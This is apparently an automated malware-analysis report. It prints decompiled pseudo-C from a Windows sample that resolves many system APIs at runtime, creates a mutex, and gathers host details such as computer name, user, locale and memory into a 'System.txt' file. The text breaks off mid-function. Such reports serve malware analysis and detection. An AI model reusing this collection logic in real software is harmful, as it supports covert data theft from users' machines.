                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E0040561C() {
                                                                                                                                                                                          				struct HINSTANCE__* _t110;
                                                                                                                                                                                          				struct HINSTANCE__* _t112;
                                                                                                                                                                                          				struct HINSTANCE__* _t114;
                                                                                                                                                                                          				struct HINSTANCE__* _t116;
                                                                                                                                                                                          				struct HINSTANCE__* _t117;
                                                                                                                                                                                          				struct HINSTANCE__* _t120;
                                                                                                                                                                                          				_Unknown_base(*)()* _t121;
                                                                                                                                                                                          
                                                                                                                                                                                          				 *0x41c678 = LoadLibraryA("kernel32.dll");
                                                                                                                                                                                          				 *0x41c67c = GetProcAddress( *0x41c678, "ExpandEnvironmentStringsW");
                                                                                                                                                                                          				 *0x41c680 = GetProcAddress( *0x41c678, "GetComputerNameW");
                                                                                                                                                                                          				 *0x41c684 = GetProcAddress( *0x41c678, "GlobalMemoryStatus");
                                                                                                                                                                                          				 *0x41c688 = GetProcAddress( *0x41c678, "CreateFileW");
                                                                                                                                                                                          				 *0x41c68c = GetProcAddress( *0x41c678, "GetFileSize");
                                                                                                                                                                                          				 *0x41c690 = GetProcAddress( *0x41c678, "CloseHandle");
                                                                                                                                                                                          				 *0x41c694 = GetProcAddress( *0x41c678, "ReadFile");
                                                                                                                                                                                          				 *0x41c698 = GetProcAddress( *0x41c678, "GetFileAttributesW");
                                                                                                                                                                                          				 *0x41c69c = GetProcAddress( *0x41c678, "CreateMutexA");
                                                                                                                                                                                          				 *0x41c6a0 = GetProcAddress( *0x41c678, "ReleaseMutex");
                                                                                                                                                                                          				 *0x41c6a4 = GetProcAddress( *0x41c678, "GetLastError");
                                                                                                                                                                                          				 *0x41c6a8 = GetProcAddress( *0x41c678, "GetCurrentDirectoryW");
                                                                                                                                                                                          				 *0x41c6ac = GetProcAddress( *0x41c678, "SetEnvironmentVariableW");
                                                                                                                                                                                          				 *0x41c6b0 = GetProcAddress( *0x41c678, "GetEnvironmentVariableW");
                                                                                                                                                                                          				 *0x41c6b4 = GetProcAddress( *0x41c678, "SetCurrentDirectoryW");
                                                                                                                                                                                          				 *0x41c6b8 = GetProcAddress( *0x41c678, "FindFirstFileW");
                                                                                                                                                                                          				 *0x41c6bc = GetProcAddress( *0x41c678, "FindNextFileW");
                                                                                                                                                                                          				 *0x41c6c0 = GetProcAddress( *0x41c678, "LocalFree");
                                                                                                                                                                                          				 *0x41c6c4 = GetProcAddress( *0x41c678, "GetTickCount");
                                                                                                                                                                                          				 *0x41c6c8 = GetProcAddress( *0x41c678, "CopyFileW");
                                                                                                                                                                                          				 *0x41c6cc = GetProcAddress( *0x41c678, "FindClose");
                                                                                                                                                                                          				 *0x41c6d0 = GetProcAddress( *0x41c678, "GlobalMemoryStatusEx");
                                                                                                                                                                                          				 *0x41c6d4 = GetProcAddress( *0x41c678, "CreateToolhelp32Snapshot");
                                                                                                                                                                                          				 *0x41c6d8 = GetProcAddress( *0x41c678, "Process32FirstW");
                                                                                                                                                                                          				 *0x41c6dc = GetProcAddress( *0x41c678, "Process32NextW");
                                                                                                                                                                                          				 *0x41c6e0 = GetProcAddress( *0x41c678, "GetModuleFileNameW");
                                                                                                                                                                                          				 *0x41c6e4 = GetProcAddress( *0x41c678, "SetDllDirectoryW");
                                                                                                                                                                                          				 *0x41c6e8 = GetProcAddress( *0x41c678, "GetLocaleInfoA");
                                                                                                                                                                                          				 *0x41c6ec = GetProcAddress( *0x41c678, "GetLocalTime");
                                                                                                                                                                                          				 *0x41c6f0 = GetProcAddress( *0x41c678, "GetTimeZoneInformation");
                                                                                                                                                                                          				 *0x41c6f4 = GetProcAddress( *0x41c678, "RemoveDirectoryW");
                                                                                                                                                                                          				 *0x41c6f8 = GetProcAddress( *0x41c678, "DeleteFileW");
                                                                                                                                                                                          				 *0x41c6fc = GetProcAddress( *0x41c678, "GetLogicalDriveStringsA");
                                                                                                                                                                                          				 *0x41c700 = GetProcAddress( *0x41c678, "GetDriveTypeA");
                                                                                                                                                                                          				 *0x41c704 = GetProcAddress( *0x41c678, "CreateProcessW");
                                                                                                                                                                                          				 *0x41c708 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                          				 *0x41c70c = GetProcAddress( *0x41c708, "GetUserNameW");
                                                                                                                                                                                          				 *0x41c710 = GetProcAddress( *0x41c708, "RegCreateKeyExW");
                                                                                                                                                                                          				 *0x41c714 = GetProcAddress( *0x41c708, "RegQueryValueExW");
                                                                                                                                                                                          				 *0x41c718 = GetProcAddress( *0x41c708, "RegCloseKey");
                                                                                                                                                                                          				 *0x41c71c = GetProcAddress( *0x41c708, "RegOpenKeyExW");
                                                                                                                                                                                          				 *0x41c720 = GetProcAddress( *0x41c708, "AllocateAndInitializeSid");
                                                                                                                                                                                          				 *0x41c724 = GetProcAddress( *0x41c708, "LookupAccountSidA");
                                                                                                                                                                                          				 *0x41c728 = GetProcAddress( *0x41c708, "CreateProcessAsUserW");
                                                                                                                                                                                          				 *0x41c72c = GetProcAddress( *0x41c708, "CheckTokenMembership");
                                                                                                                                                                                          				 *0x41c730 = GetProcAddress( *0x41c708, "RegOpenKeyW");
                                                                                                                                                                                          				 *0x41c734 = GetProcAddress( *0x41c708, "RegEnumKeyW");
                                                                                                                                                                                          				 *0x41c738 = GetProcAddress( *0x41c708, "RegEnumValueW");
                                                                                                                                                                                          				 *0x41c73c = GetProcAddress( *0x41c708, "CryptAcquireContextA");
                                                                                                                                                                                          				 *0x41c740 = GetProcAddress( *0x41c708, "CryptCreateHash");
                                                                                                                                                                                          				 *0x41c744 = GetProcAddress( *0x41c708, "CryptHashData");
                                                                                                                                                                                          				 *0x41c748 = GetProcAddress( *0x41c708, "CryptGetHashParam");
                                                                                                                                                                                          				 *0x41c74c = GetProcAddress( *0x41c708, "CryptDestroyHash");
                                                                                                                                                                                          				 *0x41c750 = GetProcAddress( *0x41c708, "CryptReleaseContext");
                                                                                                                                                                                          				 *0x41c754 = LoadLibraryA("user32.dll");
                                                                                                                                                                                          				_t110 =  *0x41c754; // 0x770a0000
                                                                                                                                                                                          				 *0x41c758 = GetProcAddress(_t110, "EnumDisplayDevicesW");
                                                                                                                                                                                          				_t112 =  *0x41c754; // 0x770a0000
                                                                                                                                                                                          				 *0x41c75c = GetProcAddress(_t112, "wvsprintfA");
                                                                                                                                                                                          				_t114 =  *0x41c754; // 0x770a0000
                                                                                                                                                                                          				 *0x41c760 = GetProcAddress(_t114, "GetKeyboardLayoutList");
                                                                                                                                                                                          				_t116 = LoadLibraryA("shell32.dll"); // executed
                                                                                                                                                                                          				 *0x41c764 = _t116;
                                                                                                                                                                                          				_t117 =  *0x41c764; // 0x748e0000
                                                                                                                                                                                          				 *0x41c768 = GetProcAddress(_t117, "ShellExecuteExW");
                                                                                                                                                                                          				 *0x41c76c = LoadLibraryA("ntdll.dll");
                                                                                                                                                                                          				_t120 =  *0x41c76c; // 0x77df0000
                                                                                                                                                                                          				_t121 = GetProcAddress(_t120, "RtlComputeCrc32");
                                                                                                                                                                                          				 *0x41c770 = _t121;
                                                                                                                                                                                          				return _t121;
                                                                                                                                                                                          			}











                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00419155), ref: 0040562D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 0040563C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040564E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 00405660
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00405672
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 00405684
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00405696
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056A8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 004056BA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 004056CC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 004056DE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLastError), ref: 004056F0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 00405702
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405714
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetEnvironmentVariableW), ref: 00405726
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405738
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 0040574A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 0040575C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LocalFree), ref: 0040576E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 00405780
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 00405792
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057A4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057B6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004057C8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004057DA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004057EC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 004057FE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00405810
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 00405822
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 00405834
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405846
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405858
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 0040586A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 0040587C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 0040588E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058A0
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058AF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058BE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 004058D0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 004058E2
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 004058F4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405906
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405918
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 0040592A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 0040593C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040594E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 00405960
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 00405972
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 00405984
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00405996
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059A8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059BA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 004059CC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 004059DE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 004059F0
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 004059FF
                                                                                                                                                                                          • GetProcAddress.KERNEL32(770A0000,EnumDisplayDevicesW), ref: 00405A14
                                                                                                                                                                                          • GetProcAddress.KERNEL32(770A0000,wvsprintfA), ref: 00405A29
                                                                                                                                                                                          • GetProcAddress.KERNEL32(770A0000,GetKeyboardLayoutList), ref: 00405A3E
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(shell32.dll,770A0000,GetKeyboardLayoutList,770A0000,wvsprintfA,770A0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A4D
                                                                                                                                                                                          • GetProcAddress.KERNEL32(748E0000,ShellExecuteExW), ref: 00405A62
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(ntdll.dll,748E0000,ShellExecuteExW,shell32.dll,770A0000,GetKeyboardLayoutList,770A0000,wvsprintfA,770A0000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405A71
                                                                                                                                                                                          • GetProcAddress.KERNEL32(77DF0000,RtlComputeCrc32), ref: 00405A86
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                          • String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetEnvironmentVariableW$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          C-Code - Quality: 68%
                                                                                                                                                                                          			E00419108(char __eax, void* __ebx, void* __edi, void* __esi, void* __fp0) {
                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                          				char _v40;
                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                          				char _v48;
                                                                                                                                                                                          				char _v52;
                                                                                                                                                                                          				void* _v56;
                                                                                                                                                                                          				char _v60;
                                                                                                                                                                                          				char _v64;
                                                                                                                                                                                          				signed int _v68;
                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                          				char _v76;
                                                                                                                                                                                          				char _v80;
                                                                                                                                                                                          				char _v81;
                                                                                                                                                                                          				char _v82;
                                                                                                                                                                                          				char _v83;
                                                                                                                                                                                          				char _v88;
                                                                                                                                                                                          				char* _v92;
                                                                                                                                                                                          				char _v96;
                                                                                                                                                                                          				char _v100;
                                                                                                                                                                                          				char* _v104;
                                                                                                                                                                                          				void* _v108;
                                                                                                                                                                                          				char _v112;
                                                                                                                                                                                          				char _v241;
                                                                                                                                                                                          				intOrPtr _v276;
                                                                                                                                                                                          				intOrPtr _v280;
                                                                                                                                                                                          				intOrPtr _v284;
                                                                                                                                                                                          				intOrPtr _v288;
                                                                                                                                                                                          				intOrPtr _v292;
                                                                                                                                                                                          				intOrPtr _v296;
                                                                                                                                                                                          				intOrPtr _v300;
                                                                                                                                                                                          				char _v304;
                                                                                                                                                                                          				char _v308;
                                                                                                                                                                                          				char _v312;
                                                                                                                                                                                          				intOrPtr _v316;
                                                                                                                                                                                          				char _v320;
                                                                                                                                                                                          				char _v324;
                                                                                                                                                                                          				char _v328;
                                                                                                                                                                                          				char _v332;
                                                                                                                                                                                          				char _v336;
                                                                                                                                                                                          				char _v340;
                                                                                                                                                                                          				void* _v344;
                                                                                                                                                                                          				void* _v348;
                                                                                                                                                                                          				void* _v352;
                                                                                                                                                                                          				char _v356;
                                                                                                                                                                                          				char _v360;
                                                                                                                                                                                          				char _v364;
                                                                                                                                                                                          				char _v368;
                                                                                                                                                                                          				char _v372;
                                                                                                                                                                                          				char _v376;
                                                                                                                                                                                          				char _v380;
                                                                                                                                                                                          				char _v384;
                                                                                                                                                                                          				char _v388;
                                                                                                                                                                                          				char _v392;
                                                                                                                                                                                          				char _v396;
                                                                                                                                                                                          				char _v400;
                                                                                                                                                                                          				char _v404;
                                                                                                                                                                                          				char _v408;
                                                                                                                                                                                          				char _v412;
                                                                                                                                                                                          				char _v416;
                                                                                                                                                                                          				char _v420;
                                                                                                                                                                                          				char _v424;
                                                                                                                                                                                          				char _v428;
                                                                                                                                                                                          				char _v432;
                                                                                                                                                                                          				char _v436;
                                                                                                                                                                                          				char _v440;
                                                                                                                                                                                          				char _v444;
                                                                                                                                                                                          				char _v448;
                                                                                                                                                                                          				char _v452;
                                                                                                                                                                                          				intOrPtr _v456;
                                                                                                                                                                                          				intOrPtr _v460;
                                                                                                                                                                                          				char _v464;
                                                                                                                                                                                          				char _v468;
                                                                                                                                                                                          				char _v472;
                                                                                                                                                                                          				char _v476;
                                                                                                                                                                                          				char _v480;
                                                                                                                                                                                          				char _v484;
                                                                                                                                                                                          				char _v488;
                                                                                                                                                                                          				char _v492;
                                                                                                                                                                                          				char _v496;
                                                                                                                                                                                          				char _v500;
                                                                                                                                                                                          				char _v504;
                                                                                                                                                                                          				char _v508;
                                                                                                                                                                                          				char _v512;
                                                                                                                                                                                          				char _v516;
                                                                                                                                                                                          				char _v520;
                                                                                                                                                                                          				char _v524;
                                                                                                                                                                                          				char _v528;
                                                                                                                                                                                          				char _v532;
                                                                                                                                                                                          				char _v536;
                                                                                                                                                                                          				char _v540;
                                                                                                                                                                                          				char _v544;
                                                                                                                                                                                          				char _v548;
                                                                                                                                                                                          				char _v552;
                                                                                                                                                                                          				char _v556;
                                                                                                                                                                                          				char _v560;
                                                                                                                                                                                          				char _v564;
                                                                                                                                                                                          				char _v568;
                                                                                                                                                                                          				char _v572;
                                                                                                                                                                                          				char _v576;
                                                                                                                                                                                          				char _v580;
                                                                                                                                                                                          				char _v584;
                                                                                                                                                                                          				char _v588;
                                                                                                                                                                                          				char _v592;
                                                                                                                                                                                          				char _v596;
                                                                                                                                                                                          				char _v600;
                                                                                                                                                                                          				intOrPtr _v604;
                                                                                                                                                                                          				char _v608;
                                                                                                                                                                                          				char _v612;
                                                                                                                                                                                          				char _v616;
                                                                                                                                                                                          				char _v620;
                                                                                                                                                                                          				intOrPtr _v624;
                                                                                                                                                                                          				char _v628;
                                                                                                                                                                                          				char _v632;
                                                                                                                                                                                          				char _v636;
                                                                                                                                                                                          				char _v640;
                                                                                                                                                                                          				char _v644;
                                                                                                                                                                                          				char _v648;
                                                                                                                                                                                          				char _v652;
				void* _t446;
				void* _t452;
				intOrPtr* _t453;
				intOrPtr _t546;
				intOrPtr* _t616;
				intOrPtr* _t623;
				intOrPtr* _t630;
				intOrPtr* _t637;
				intOrPtr _t651;
				intOrPtr* _t654;
				intOrPtr* _t657;
				intOrPtr* _t660;
				intOrPtr* _t663;
				intOrPtr _t668;
				intOrPtr* _t671;
				void* _t677;
				intOrPtr* _t714;
				intOrPtr _t756;
				signed int _t806;
				intOrPtr* _t827;
				intOrPtr* _t830;
				signed int _t837;
				signed int _t884;
				intOrPtr _t907;
				int _t920;
				intOrPtr* _t932;
				void* _t954;
				signed int _t955;
				signed int _t956;
				void* _t957;
				void* _t975;
				intOrPtr _t983;
				intOrPtr _t1001;
				intOrPtr* _t1045;
				intOrPtr* _t1072;
				void* _t1094;
				void* _t1102;
				void* _t1132;
				void* _t1134;
				void* _t1135;
				signed int _t1137;
				intOrPtr _t1140;
				intOrPtr _t1141;
				void* _t1146;
				void* _t1167;
				void* _t1173;
				void* _t1181;
				void* _t1183;

				_t1183 = __fp0;
				_t1130 = __edi;
				_t1140 = _t1141;
				_t957 = 0x51;
				do {
					_push(0);
					_push(0);
					_t957 = _t957 - 1;
					_t1142 = _t957;
				} while (_t957 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v8 = __eax;
				E00403980(_v8);
				_push(_t1140);
				_push(0x41a13a);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1141;
				E004034E4( &_v72);
				_v82 = 0;
				_v81 = 0;
				E0040357C( &_v88, 0x41a158);
				E0040561C();
				E00407D24( &_v308, _t1142);
				_push( &_v308);
				E00406C4C( &_v312, __ebx, __esi); // executed
				_pop(_t446);
				E00403798(_t446, _v312);
				_t452 = CreateMutexA(0, 0, E00403990(_v308)); // executed
				_v108 = _t452;
				_t453 =  *0x41b558; // 0x41c6a4
				if( *((intOrPtr*)( *_t453))() == 0xb7) {
					L68:
					_pop(_t983);
					 *[fs:eax] = _t983;
					_push(E0041A144);
					E004034E4( &_v652);
					E00403B98( &_v648, 2);
					E004034E4( &_v640);
					E00403B98( &_v636, 5);
					E00403508( &_v616, 0xa);
					E00403B80( &_v576);
					E00403508( &_v572, 2);
					E00403B80( &_v564);
					E00403508( &_v560, 2);
					E00403B80( &_v552);
					E00403508( &_v548, 2);
					E00403B80( &_v540);
					E00403508( &_v536, 2);
					E00403B80( &_v528);
					E00403508( &_v524, 2);
					E00403B80( &_v516);
					E00403508( &_v512, 2);
					E00403B80( &_v504);
					E00403508( &_v500, 2);
					E00403B80( &_v492);
					E00403508( &_v488, 0xa);
					E00403B98( &_v448, 2);
					E004034E4( &_v440);
					E00403B98( &_v436, 3);
					E004034E4( &_v424);
					E00403B98( &_v420, 2);
					E004034E4( &_v412);
					E00403B98( &_v408, 8);
					E004034E4( &_v376);
					E00403B98( &_v372, 4);
					E00403508( &_v356, 0xd);
					_t1001 =  *0x405f2c; // 0x405f30
					E00404224( &_v60, 5, _t1001);
					E00403508( &_v40, 7);
					E004034E4( &_v8);
					E004034E4( &_v112);
					E00403508( &_v104, 5);
					E00403508( &_v80, 3);
					return E004034E4( &_v64);
				} else {
					E004034E4( &_v112);
					_t954 = 0x44d;
					_t1137 = 0x41b0fc;
					while( *_t1137 != 0) {
						E004036CC();
						E00403798( &_v112, _v316);
						_t1137 = _t1137 + 1;
						_t954 = _t954 - 1;
						if(_t954 != 0) {
							continue;
						}
						break;
					}
					E00418F9C(_v112, _t954, _t957, _t1130, _t1137);
					E00406C4C( &_v324, _t954, _t1137); // executed
					E00406810(_v324, _t954, _t957,  &_v320, _t1130, _t1137);
					E004037DC( &_v32, _v320, _v88);
					E004176D8( &_v32, _t954, 0x80000, _v88, _t1130, _t1137);
					_t546 =  *0x41c8c0; // 0x0, executed
					E00418688(_t546, _t954, _v32, _t1130, _t1137,  &_v16); // executed
					E004176D8( &_v16, _t954, 0x80000, _v88, _t1130, _t1137);
					_t1146 = E00403790(_v16) - 0x2710;
					if(_t1146 < 0) {
						goto L68;
					}
					E004038DC(_v16, 0x41a164);
					if(_t1146 == 0) {
						goto L68;
					}
					E00407428(0x41a184, _t954, 0x41a174, _v16, _t1137,  &_v328);
					E00406984(_v328, _t954,  &_v36, _t1130, _t1137);
					E00407428(0x41a1a0, _t954, 0x41a190, _v16, _t1137,  &_v332);
					E00406AE4(_v332, _t954,  &_v40, _t1130, _t1137);
					E0040795C(0x41a1ac,  &_v44, _v36, _t1146);
					_t968 = 0x41a1b8;
					E00407428(0x41a1c8, _t954, 0x41a1b8, _v16, _t1137,  &_v340);
					_t1017 =  &_v336;
					E00406984(_v340, _t954,  &_v336, _t1130, _t1137);
					E004080C4(_v336, _t1146);
					E00408328(_v40, _t954,  &_v336, _t1130, _t1137);
					E0040DC44();
					_t1132 = E004045EC(_v44) - 1;
					if(_t1132 < 0) {
						L48:
						_push(_v8);
						_push(0x41a1ac);
                                                                                                                                                                                          						E00417290( &_v464, _t954, _t1017, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v464);
                                                                                                                                                                                          						E00403850();
                                                                                                                                                                                          						E0040DCE8(_v460, _t954, "System.txt", _t1132, _t1137);
                                                                                                                                                                                          						E00406C4C( &_v472, _t954, _t1137);
                                                                                                                                                                                          						E00406810(_v472, _t954, _t968,  &_v468, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v468);
                                                                                                                                                                                          						_push(0x41a3e8);
                                                                                                                                                                                          						E00407A4C( &_v480, _t954, _t1132, _t1137);
                                                                                                                                                                                          						E00406810(_v480, _t954, _t968,  &_v476, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v476);
                                                                                                                                                                                          						_push(0x41a3e8);
                                                                                                                                                                                          						E00406BB4( &_v492);
                                                                                                                                                                                          						E0040377C( &_v488, _v492);
                                                                                                                                                                                          						E00406810(_v488, _t954, _t968,  &_v484, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v484);
                                                                                                                                                                                          						_push(0x41a3e8);
                                                                                                                                                                                          						E004066C0( &_v504, _t1168);
                                                                                                                                                                                          						E0040377C( &_v500, _v504);
                                                                                                                                                                                          						E00406810(_v500, _t954, _t968,  &_v496, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v496);
                                                                                                                                                                                          						_push(0x41a3e8);
                                                                                                                                                                                          						E00406610( &_v516);
                                                                                                                                                                                          						E0040377C( &_v512, _v516);
                                                                                                                                                                                          						E00406810(_v512, _t954, _t968,  &_v508, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v508);
                                                                                                                                                                                          						_push(0x41a3e8);
                                                                                                                                                                                          						E004065CC( &_v528);
                                                                                                                                                                                          						E0040377C( &_v524, _v528);
                                                                                                                                                                                          						E00406810(_v524, _t954, _t968,  &_v520, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v520);
                                                                                                                                                                                          						_push(0x41a3e8);
                                                                                                                                                                                          						_t616 =  *0x41b5b8; // 0x41b0b8
                                                                                                                                                                                          						E00406FDC( *_t616, _t954,  &_v540, _t1137, _t1168);
                                                                                                                                                                                          						E0040377C( &_v536, _v540);
                                                                                                                                                                                          						E00406810(_v536, _t954, _t968,  &_v532, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v532);
                                                                                                                                                                                          						_push(0x41a3e8);
                                                                                                                                                                                          						_t623 =  *0x41b5c4; // 0x41b0b0
                                                                                                                                                                                          						E00406FDC( *_t623, _t954,  &_v552, _t1137, _t1168);
                                                                                                                                                                                          						E0040377C( &_v548, _v552);
                                                                                                                                                                                          						E00406810(_v548, _t954, _t968,  &_v544, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v544);
                                                                                                                                                                                          						_push(0x41a3e8);
                                                                                                                                                                                          						_t630 =  *0x41b584; // 0x41b0b4
                                                                                                                                                                                          						E00406FDC( *_t630, _t954,  &_v564, _t1137, _t1168);
                                                                                                                                                                                          						E0040377C( &_v560, _v564);
                                                                                                                                                                                          						E00406810(_v560, _t954, _t968,  &_v556, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v556);
                                                                                                                                                                                          						_push(0x41a3e8);
                                                                                                                                                                                          						_t637 =  *0x41b638; // 0x41b0ac
                                                                                                                                                                                          						E00406FDC( *_t637, _t954,  &_v576, _t1137, _t1168);
                                                                                                                                                                                          						E0040377C( &_v572, _v576);
                                                                                                                                                                                          						E00406810(_v572, _t954, _t968,  &_v568, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v568);
                                                                                                                                                                                          						_push(0x41a3e8);
                                                                                                                                                                                          						E00406810(_v8, _t954, _t968,  &_v580, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v580);
                                                                                                                                                                                          						_push(0x41a3e8);
                                                                                                                                                                                          						E00407D24( &_v588, _t1168);
                                                                                                                                                                                          						E00406810(_v588, _t954, _t968,  &_v584, _t1132, _t1137);
                                                                                                                                                                                          						_push(_v584);
